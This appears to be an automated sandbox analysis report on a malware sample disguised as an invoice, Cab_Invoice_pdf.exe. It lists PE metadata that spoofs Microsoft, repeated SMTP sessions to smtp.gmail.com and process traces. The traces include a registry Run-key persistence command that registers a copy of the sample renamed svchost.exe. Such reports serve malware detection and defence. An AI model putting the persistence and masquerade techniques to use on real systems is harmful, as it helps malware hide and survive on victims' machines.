                          mov edx, dword ptr [esp+14h]
                          mov eax, dword ptr [esp+10h]
                          shr ebx, 1
                          rcr ecx, 1
                          shr edx, 1
                          rcr eax, 1
                          or ebx, ebx
                          jne 00007F2AF83A0B16h
                          div ecx
                          mov esi, eax
                          mul dword ptr [esp+1Ch]
                          mov ecx, eax
                          mov eax, dword ptr [esp+18h]
                          mul esi
                          add edx, ecx
                          jc 00007F2AF83A0B30h
                          cmp edx, dword ptr [esp+14h]
                          jnbe 00007F2AF83A0B2Ah
                          jc 00007F2AF83A0B29h
                          cmp eax, dword ptr [esp+10h]
                          jbe 00007F2AF83A0B23h
                          dec esi
                          xor edx, edx
                          mov eax, esi
                          dec edi
                          jne 00007F2AF83A0B29h
                          neg edx
                          neg eax
                          sbb edx, 00000000h
                          pop ebx
                          pop esi
                          pop edi
                          retn 0010h
                          push ebp
                          mov ebp, esp
                          push 00000000h
                          call dword ptr [00420084h]
                          push dword ptr [ebp+08h]
                          call dword ptr [00000080h]

                          Rich Headers

                          Programming Language:
                          • [RES] VS2015 UPD3 build 24213

                          Data Directories

                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2aaac | 0x64 | .rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38000 | 0x7cd8 | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x40000 | 0x17c8 | .reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2a100 | 0x1c | .rdata
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2a120 | 0x40 | .rdata
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x20000 | 0x19c | .rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0

                          Sections

                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x1000 | 0x1e974 | 0x1ea00 | False | 0.575279017857 | MPEG-4 LOAS | 6.64612882784 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .rdata | 0x20000 | 0xb446 | 0xb600 | False | 0.557842548077 | data | 6.07584328103 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data | 0x2c000 | 0xa678 | 0xa00 | False | 0.15 | data | 1.92492004093 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .gfids | 0x37000 | 0xb8 | 0x200 | False | 0.298828125 | data | 1.80091798684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .rsrc | 0x38000 | 0x7cd8 | 0x7e00 | False | 0.537419394841 | data | 6.72459510449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc | 0x40000 | 0x17c8 | 0x1800 | False | 0.809244791667 | data | 6.6658882991 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          Name | RVA | Size | Type | Language | Country
                          RT_ICON | 0x381f0 | 0x2db3 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                          RT_ICON | 0x3afa4 | 0x25a8 | data
                          RT_ICON | 0x3d54c | 0x10a8 | data
                          RT_ICON | 0x3e5f4 | 0x988 | data
                          RT_ICON | 0x3ef7c | 0x468 | GLS_BINARY_LSB_FIRST
                          RT_GROUP_ICON | 0x3f3e4 | 0x4c | data
                          RT_VERSION | 0x3f430 | 0x2d4 | data
                          RT_MANIFEST | 0x3f704 | 0x5d2 | XML 1.0 document, ASCII text, with CRLF line terminators

                          Imports

                          DLL | Import
                          USER32.dll | MessageBoxW, MessageBoxA
                          KERNEL32.dll | GetModuleFileNameW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, SetDllDirectoryW, CreateProcessW, GetStartupInfoW, LoadLibraryExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, LoadLibraryA, MultiByteToWideChar, WideCharToMultiByte, GetLastError, DecodePointer, GetExitCodeProcess, CreateFileW, SetEndOfFile, HeapReAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetModuleHandleW, RtlUnwind, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetCommandLineA, ReadFile, RaiseException, GetDriveTypeW, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindClose, FindFirstFileExW, FindNextFileW, SetStdHandle, SetConsoleCtrlHandler, DeleteFileW, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, GetACP, HeapFree, HeapAlloc, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleCP, CompareStringW, LCMapStringW, GetCurrentDirectoryW, FlushFileBuffers, SetEnvironmentVariableA, GetFileAttributesExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStringTypeW, GetProcessHeap, WriteConsoleW, GetTimeZoneInformation, HeapSize
                          ADVAPI32.dll | ConvertSidToStringSidW, GetTokenInformation, OpenProcessToken, ConvertStringSecurityDescriptorToSecurityDescriptorW
                          WS2_32.dll | ntohl

                          Version Infos

                          Description | Data
                          LegalCopyright | (c) 2021
                          InternalName | Cab_Invoice_pdf.exe
                          FileVersion | 0.2.4.5
                          CompanyName | Microsoft Windows
                          ProductName |
                          ProductVersion | 1.0.0.0
                          FileDescription | Microsoft Trusted Source
                          OriginalFilename | Cab_Invoice_pdf.exe
                          Translation | 0x0000 0x04b0

                          Network Behavior

                          TCP Packets


                          UDP Packets

                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Dec 4, 2021 23:22:00.746205091 CET | 51143 | 53 | 192.168.2.3 | 8.8.8.8
                          Dec 4, 2021 23:22:00.787013054 CET | 53 | 51143 | 8.8.8.8 | 192.168.2.3
                          Dec 4, 2021 23:22:16.199250937 CET | 49572 | 53 | 192.168.2.3 | 8.8.8.8
                          Dec 4, 2021 23:22:16.239649057 CET | 53 | 49572 | 8.8.8.8 | 192.168.2.3
                          Dec 4, 2021 23:22:31.635875940 CET | 63297 | 53 | 192.168.2.3 | 8.8.8.8
                          Dec 4, 2021 23:22:31.663851976 CET | 53 | 63297 | 8.8.8.8 | 192.168.2.3
                          Dec 4, 2021 23:22:47.018791914 CET | 53615 | 53 | 192.168.2.3 | 8.8.8.8
                          Dec 4, 2021 23:22:47.049907923 CET | 53 | 53615 | 8.8.8.8 | 192.168.2.3
                          Dec 4, 2021 23:23:02.406687021 CET | 50728 | 53 | 192.168.2.3 | 8.8.8.8
                          Dec 4, 2021 23:23:02.426625013 CET | 53 | 50728 | 8.8.8.8 | 192.168.2.3
                          Dec 4, 2021 23:23:17.804111004 CET | 60982 | 53 | 192.168.2.3 | 8.8.8.8
                          Dec 4, 2021 23:23:17.824145079 CET | 53 | 60982 | 8.8.8.8 | 192.168.2.3
                          Dec 4, 2021 23:23:33.163980007 CET | 64367 | 53 | 192.168.2.3 | 8.8.8.8
                          Dec 4, 2021 23:23:33.183679104 CET | 53 | 64367 | 8.8.8.8 | 192.168.2.3

                          DNS Queries

                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                          Dec 4, 2021 23:22:00.746205091 CET | 192.168.2.3 | 8.8.8.8 | 0xca6b | Standard query (0) | smtp.gmail.com | A (IP address) | IN (0x0001)
                          Dec 4, 2021 23:22:16.199250937 CET | 192.168.2.3 | 8.8.8.8 | 0x953 | Standard query (0) | smtp.gmail.com | A (IP address) | IN (0x0001)
                          Dec 4, 2021 23:22:31.635875940 CET | 192.168.2.3 | 8.8.8.8 | 0x84a2 | Standard query (0) | smtp.gmail.com | A (IP address) | IN (0x0001)
                          Dec 4, 2021 23:22:47.018791914 CET | 192.168.2.3 | 8.8.8.8 | 0x159d | Standard query (0) | smtp.gmail.com | A (IP address) | IN (0x0001)
                          Dec 4, 2021 23:23:02.406687021 CET | 192.168.2.3 | 8.8.8.8 | 0x1d6a | Standard query (0) | smtp.gmail.com | A (IP address) | IN (0x0001)
                          Dec 4, 2021 23:23:17.804111004 CET | 192.168.2.3 | 8.8.8.8 | 0xd29d | Standard query (0) | smtp.gmail.com | A (IP address) | IN (0x0001)
                          Dec 4, 2021 23:23:33.163980007 CET | 192.168.2.3 | 8.8.8.8 | 0x670 | Standard query (0) | smtp.gmail.com | A (IP address) | IN (0x0001)

                          DNS Answers

                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                          Dec 4, 2021 23:22:00.787013054 CET | 8.8.8.8 | 192.168.2.3 | 0xca6b | No error (0) | smtp.gmail.com | | 142.250.145.108 | A (IP address) | IN (0x0001)
                          Dec 4, 2021 23:22:16.239649057 CET | 8.8.8.8 | 192.168.2.3 | 0x953 | No error (0) | smtp.gmail.com | | 142.250.145.108 | A (IP address) | IN (0x0001)
                          Dec 4, 2021 23:22:31.663851976 CET | 8.8.8.8 | 192.168.2.3 | 0x84a2 | No error (0) | smtp.gmail.com | | 142.250.145.109 | A (IP address) | IN (0x0001)
                          Dec 4, 2021 23:22:47.049907923 CET | 8.8.8.8 | 192.168.2.3 | 0x159d | No error (0) | smtp.gmail.com | | 142.250.145.109 | A (IP address) | IN (0x0001)
                          Dec 4, 2021 23:23:02.426625013 CET | 8.8.8.8 | 192.168.2.3 | 0x1d6a | No error (0) | smtp.gmail.com | | 142.250.145.109 | A (IP address) | IN (0x0001)
                          Dec 4, 2021 23:23:17.824145079 CET | 8.8.8.8 | 192.168.2.3 | 0xd29d | No error (0) | smtp.gmail.com | | 142.250.145.108 | A (IP address) | IN (0x0001)
                          Dec 4, 2021 23:23:33.183679104 CET | 8.8.8.8 | 192.168.2.3 | 0x670 | No error (0) | smtp.gmail.com | | 142.250.145.109 | A (IP address) | IN (0x0001)

                          SMTP Packets

                          Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                          Dec 4, 2021 23:22:00.877780914 CET | 587 | 49751 | 142.250.145.108 | 192.168.2.3 | 220 smtp.gmail.com ESMTP nb4sm4266060ejc.21 - gsmtp
                          Dec 4, 2021 23:22:00.933149099 CET | 587 | 49751 | 142.250.145.108 | 192.168.2.3 | 250-smtp.gmail.com at your service, [84.17.52.65]
                          250-SIZE 35882577
                          250-8BITMIME
                          250-STARTTLS
                          250-ENHANCEDSTATUSCODES
                          250-PIPELINING
                          250-CHUNKING
                          250 SMTPUTF8
                          Dec 4, 2021 23:22:00.936467886 CET | 49751 | 587 | 192.168.2.3 | 142.250.145.108 | STARTTLS
                          Dec 4, 2021 23:22:00.965125084 CET | 587 | 49751 | 142.250.145.108 | 192.168.2.3 | 220 2.0.0 Ready to start TLS
                          Dec 4, 2021 23:22:16.314048052 CET | 587 | 49754 | 142.250.145.108 | 192.168.2.3 | 220 smtp.gmail.com ESMTP g11sm4813068edz.53 - gsmtp
                          Dec 4, 2021 23:22:16.370438099 CET | 587 | 49754 | 142.250.145.108 | 192.168.2.3 | 250-smtp.gmail.com at your service, [84.17.52.65]
                          250-SIZE 35882577
                          250-8BITMIME
                          250-STARTTLS
                          250-ENHANCEDSTATUSCODES
                          250-PIPELINING
                          250-CHUNKING
                          250 SMTPUTF8
                          Dec 4, 2021 23:22:16.370827913 CET | 49754 | 587 | 192.168.2.3 | 142.250.145.108 | STARTTLS
                          Dec 4, 2021 23:22:16.398401976 CET | 587 | 49754 | 142.250.145.108 | 192.168.2.3 | 220 2.0.0 Ready to start TLS
                          Dec 4, 2021 23:22:31.723155975 CET | 587 | 49775 | 142.250.145.109 | 192.168.2.3 | 220 smtp.gmail.com ESMTP lk22sm4330193ejb.83 - gsmtp
                          Dec 4, 2021 23:22:31.761789083 CET | 587 | 49775 | 142.250.145.109 | 192.168.2.3 | 250-smtp.gmail.com at your service, [84.17.52.65]
                          250-SIZE 35882577
                          250-8BITMIME
                          250-STARTTLS
                          250-ENHANCEDSTATUSCODES
                          250-PIPELINING
                          250-CHUNKING
                          250 SMTPUTF8
                          Dec 4, 2021 23:22:31.762145996 CET | 49775 | 587 | 192.168.2.3 | 142.250.145.109 | STARTTLS
                          Dec 4, 2021 23:22:31.790158987 CET | 587 | 49775 | 142.250.145.109 | 192.168.2.3 | 220 2.0.0 Ready to start TLS
                          Dec 4, 2021 23:22:47.108661890 CET | 587 | 49783 | 142.250.145.109 | 192.168.2.3 | 220 smtp.gmail.com ESMTP d14sm4592640edu.57 - gsmtp
                          Dec 4, 2021 23:22:47.147772074 CET | 587 | 49783 | 142.250.145.109 | 192.168.2.3 | 250-smtp.gmail.com at your service, [84.17.52.65]
                          250-SIZE 35882577
                          250-8BITMIME
                          250-STARTTLS
                          250-ENHANCEDSTATUSCODES
                          250-PIPELINING
                          250-CHUNKING
                          250 SMTPUTF8
                          Dec 4, 2021 23:22:47.148196936 CET | 49783 | 587 | 192.168.2.3 | 142.250.145.109 | STARTTLS
                          Dec 4, 2021 23:22:47.175952911 CET | 587 | 49783 | 142.250.145.109 | 192.168.2.3 | 220 2.0.0 Ready to start TLS
                          Dec 4, 2021 23:23:02.488786936 CET | 587 | 49796 | 142.250.145.109 | 192.168.2.3 | 220 smtp.gmail.com ESMTP qk40sm4254137ejc.2 - gsmtp
                          Dec 4, 2021 23:23:02.537081957 CET | 587 | 49796 | 142.250.145.109 | 192.168.2.3 | 250-smtp.gmail.com at your service, [84.17.52.65]
                          250-SIZE 35882577
                          250-8BITMIME
                          250-STARTTLS
                          250-ENHANCEDSTATUSCODES
                          250-PIPELINING
                          250-CHUNKING
                          250 SMTPUTF8
                          Dec 4, 2021 23:23:02.538055897 CET | 49796 | 587 | 192.168.2.3 | 142.250.145.109 | STARTTLS
                          Dec 4, 2021 23:23:02.566308975 CET | 587 | 49796 | 142.250.145.109 | 192.168.2.3 | 220 2.0.0 Ready to start TLS
                          Dec 4, 2021 23:23:17.894715071 CET | 587 | 49826 | 142.250.145.108 | 192.168.2.3 | 220 smtp.gmail.com ESMTP a13sm4665468edk.29 - gsmtp
                          Dec 4, 2021 23:23:17.931472063 CET | 587 | 49826 | 142.250.145.108 | 192.168.2.3 | 250-smtp.gmail.com at your service, [84.17.52.65]
                          250-SIZE 35882577
                          250-8BITMIME
                          250-STARTTLS
                          250-ENHANCEDSTATUSCODES
                          250-PIPELINING
                          250-CHUNKING
                          250 SMTPUTF8
                          Dec 4, 2021 23:23:17.931767941 CET | 49826 | 587 | 192.168.2.3 | 142.250.145.108 | STARTTLS
                          Dec 4, 2021 23:23:17.959590912 CET | 587 | 49826 | 142.250.145.108 | 192.168.2.3 | 220 2.0.0 Ready to start TLS
                          Dec 4, 2021 23:23:33.256963015 CET | 587 | 49829 | 142.250.145.109 | 192.168.2.3 | 220 smtp.gmail.com ESMTP w23sm4686966edr.19 - gsmtp
                          Dec 4, 2021 23:23:33.395736933 CET | 587 | 49829 | 142.250.145.109 | 192.168.2.3 | 250-smtp.gmail.com at your service, [84.17.52.65]
                          250-SIZE 35882577
                          250-8BITMIME
                          250-STARTTLS
                          250-ENHANCEDSTATUSCODES
                          250-PIPELINING
                          250-CHUNKING
                          250 SMTPUTF8
                          Dec 4, 2021 23:23:33.397391081 CET | 49829 | 587 | 192.168.2.3 | 142.250.145.109 | STARTTLS
                          Dec 4, 2021 23:23:33.425539970 CET | 587 | 49829 | 142.250.145.109 | 192.168.2.3 | 220 2.0.0 Ready to start TLS

                          Code Manipulations

                          Statistics

                          CPU Usage

                          Memory Usage

                          High Level Behavior Distribution

                          Behavior

                          System Behavior

                          General

                          Start time:23:21:30
                          Start date:04/12/2021
                          Path:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Cab_Invoice_pdf.exe"
                          Imagebase:0x1310000
                          File size:7399848 bytes
                          MD5 hash:E5DC6A7459FD6EF46AFEE60318470B03
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low

                          General

                          Start time:23:21:32
                          Start date:04/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                          Imagebase:0x7ff70d6e0000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:23:21:44
                          Start date:04/12/2021
                          Path:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Cab_Invoice_pdf.exe"
                          Imagebase:0x1310000
                          File size:7399848 bytes
                          MD5 hash:E5DC6A7459FD6EF46AFEE60318470B03
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low

                          General

                          Start time:23:21:52
                          Start date:04/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                          Imagebase:0x7ff70d6e0000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:23:21:58
                          Start date:04/12/2021
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe""
                          Imagebase:0xd80000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:23:21:59
                          Start date:04/12/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7f20f0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:23:21:59
                          Start date:04/12/2021
                          Path:C:\Windows\SysWOW64\reg.exe
                          Wow64 process (32bit):true
                          Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe"
                          Imagebase:0x360000
                          File size:59392 bytes
                          MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:23:22:05
                          Start date:04/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                          Imagebase:0x7ff70d6e0000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:23:22:13
                          Start date:04/12/2021
                          Path:C:\Users\user\AppData\Roaming\svchost.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                          Imagebase:0xbc0000
                          File size:7399848 bytes
                          MD5 hash:E5DC6A7459FD6EF46AFEE60318470B03
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low

                          General

                          Start time:23:22:14
                          Start date:04/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                          Imagebase:0x7ff70d6e0000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:23:22:22
                          Start date:04/12/2021
                          Path:C:\Users\user\AppData\Roaming\svchost.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                          Imagebase:0xbc0000
                          File size:7399848 bytes
                          MD5 hash:E5DC6A7459FD6EF46AFEE60318470B03
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low

                          General

                          Start time:23:22:53
                          Start date:04/12/2021
                          Path:C:\Users\user\AppData\Roaming\svchost.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                          Imagebase:0xbc0000
                          File size:7399848 bytes
                          MD5 hash:E5DC6A7459FD6EF46AFEE60318470B03
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low

                          General

                          Start time:23:23:04
                          Start date:04/12/2021
                          Path:C:\Users\user\AppData\Roaming\svchost.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                          Imagebase:0xbc0000
                          File size:7399848 bytes
                          MD5 hash:E5DC6A7459FD6EF46AFEE60318470B03
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low

                          General

                          Start time:23:23:14
                          Start date:04/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Imagebase:0x7ff70d6e0000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Disassembly

                          Code Analysis

                            Execution Graph

                            Execution Coverage:7.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:5%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:48

                            Graph

17318->17307 17320 13209c5 __fread_nolock 26 API calls 17319->17320 17321 13233b7 17320->17321 17322 132345b 17321->17322 17323 13233c9 17321->17323 17324 1322fa0 __wsopen_s 62 API calls 17322->17324 17325 13233e6 17323->17325 17328 132340c 17323->17328 17327 13233f3 17324->17327 17326 1322fa0 __wsopen_s 62 API calls 17325->17326 17326->17327 17327->17309 17328->17327 17329 13227ec 30 API calls 17328->17329 17329->17327 20438 1328599 20441 13285bf 20438->20441 20442 13285bb 20438->20442 20439 131786a _ValidateLocalCookies 5 API calls 20440 1328621 20439->20440 20441->20442 20443 132298e 31 API calls 20441->20443 20442->20439 20443->20441 19721 1326e00 19732 132c358 19721->19732 19723 1326e05 ___scrt_is_nonwritable_in_current_image 19738 1325ffe EnterCriticalSection 19723->19738 19725 1326e83 19743 1326e98 19725->19743 19727 1326e8f ___scrt_is_nonwritable_in_current_image 19729 1326e21 19729->19725 19731 1319813 65 API calls 19729->19731 19739 131a847 EnterCriticalSection 19729->19739 19740 1326e79 19729->19740 19731->19729 19733 132c367 19732->19733 19734 13209eb _free 20 API calls 19733->19734 19735 132c37a 19733->19735 19734->19733 19736 13209eb _free 20 API calls 19735->19736 19737 132c392 19735->19737 19736->19735 19737->19723 19738->19729 19739->19729 19746 131a85b LeaveCriticalSection 19740->19746 19742 1326e81 19742->19729 19747 1326046 LeaveCriticalSection 19743->19747 19745 1326e9f 19745->19727 19746->19742 19747->19745 17046 1325e01 17051 1325bbd 17046->17051 17050 1325e29 17052 1325bee 17051->17052 17059 1325d37 17052->17059 17066 132b469 17052->17066 17053 131c9ce _free 20 API calls 17054 1325ded 17053->17054 17055 1321788 pre_c_initialization 26 API calls 17054->17055 17056 1325d42 17055->17056 17056->17050 17063 132c048 17056->17063 17059->17053 17059->17056 17060 132b469 40 API calls 17061 1325daa 17060->17061 17061->17059 17062 132b469 40 API calls 17061->17062 17062->17059 17085 132b745 17063->17085 17065 132c063 17065->17050 17067 132b509 
17066->17067 17068 132b47d 17066->17068 17074 132b521 17067->17074 17070 131c9ce _free 20 API calls 17068->17070 17072 1325d8b 17068->17072 17071 132b494 17070->17071 17073 1321788 pre_c_initialization 26 API calls 17071->17073 17072->17059 17072->17060 17073->17072 17075 132b537 17074->17075 17082 132b54e 17074->17082 17076 132b53e 17075->17076 17078 132b55f 17075->17078 17077 131c9ce _free 20 API calls 17076->17077 17079 132b543 17077->17079 17080 131afae __cftof 38 API calls 17078->17080 17081 1321788 pre_c_initialization 26 API calls 17079->17081 17084 132b56a 17080->17084 17081->17082 17082->17072 17083 132aaea 40 API calls 17083->17084 17084->17082 17084->17083 17087 132b751 ___scrt_is_nonwritable_in_current_image 17085->17087 17086 132b75f 17088 131c9ce _free 20 API calls 17086->17088 17087->17086 17090 132b798 17087->17090 17089 132b764 17088->17089 17091 1321788 pre_c_initialization 26 API calls 17089->17091 17096 132bd1f 17090->17096 17095 132b76e ___scrt_is_nonwritable_in_current_image 17091->17095 17095->17065 17147 132baf3 17096->17147 17099 132bd51 17101 131c9bb __dosmaperr 20 API calls 17099->17101 17100 132bd6a 17165 131e783 17100->17165 17119 132bd56 17101->17119 17103 132bd6f 17104 132bd78 17103->17104 17105 132bd8f 17103->17105 17107 131c9bb __dosmaperr 20 API calls 17104->17107 17178 132ba5e CreateFileW 17105->17178 17106 131c9ce _free 20 API calls 17134 132b7bc 17106->17134 17109 132bd7d 17107->17109 17112 131c9ce _free 20 API calls 17109->17112 17110 132bdc8 17111 132be45 GetFileType 17110->17111 17113 132be1a GetLastError 17110->17113 17179 132ba5e CreateFileW 17110->17179 17114 132be50 GetLastError 17111->17114 17115 132be97 17111->17115 17112->17119 17116 131c998 __dosmaperr 20 API calls 17113->17116 17117 131c998 __dosmaperr 20 API calls 17114->17117 17180 131e6cc 17115->17180 17116->17119 17120 132be5e CloseHandle 17117->17120 17119->17106 17120->17119 17123 132be87 17120->17123 17122 132be0d 17122->17111 17122->17113 17125 131c9ce _free 
20 API calls 17123->17125 17127 132be8c 17125->17127 17126 132bf04 17131 132bf31 17126->17131 17204 132b811 17126->17204 17127->17119 17133 13218f4 __wsopen_s 29 API calls 17131->17133 17132 132bf42 17132->17134 17133->17134 17143 132b7e5 17134->17143 17144 132b7eb 17143->17144 17146 132b80f 17143->17146 17298 131e760 LeaveCriticalSection 17144->17298 17146->17095 17148 132bb14 17147->17148 17149 132bb2e 17147->17149 17148->17149 17151 131c9ce _free 20 API calls 17148->17151 17231 132ba83 17149->17231 17152 132bb23 17151->17152 17153 1321788 pre_c_initialization 26 API calls 17152->17153 17153->17149 17154 132bb66 17155 132bb95 17154->17155 17157 131c9ce _free 20 API calls 17154->17157 17160 132bbe8 17155->17160 17238 131d7e9 17155->17238 17159 132bb8a 17157->17159 17158 132bbe3 17158->17160 17161 132bc62 17158->17161 17162 1321788 pre_c_initialization 26 API calls 17159->17162 17160->17099 17160->17100 17163 1321798 __wsopen_s 11 API calls 17161->17163 17162->17155 17164 132bc6e 17163->17164 17166 131e78f ___scrt_is_nonwritable_in_current_image 17165->17166 17245 1325ffe EnterCriticalSection 17166->17245 17168 131e7dd 17246 131e88c 17168->17246 17169 131e7bb 17249 131e562 17169->17249 17170 131e796 17170->17168 17170->17169 17175 131e829 EnterCriticalSection 17170->17175 17173 131e806 ___scrt_is_nonwritable_in_current_image 17173->17103 17175->17168 17176 131e836 LeaveCriticalSection 17175->17176 17176->17170 17178->17110 17179->17122 17181 131e744 17180->17181 17182 131e6db 17180->17182 17183 131c9ce _free 20 API calls 17181->17183 17182->17181 17188 131e701 __wsopen_s 17182->17188 17184 131e749 17183->17184 17185 131c9bb __dosmaperr 20 API calls 17184->17185 17186 131e731 17185->17186 17186->17126 17189 132bc6f 17186->17189 17187 131e72b SetStdHandle 17187->17186 17188->17186 17188->17187 17190 132bc95 17189->17190 17191 132bc99 17189->17191 17190->17126 17191->17190 17192 1322807 __fread_nolock 28 API calls 17191->17192 17193 132bcab 17192->17193 17205 132b844 
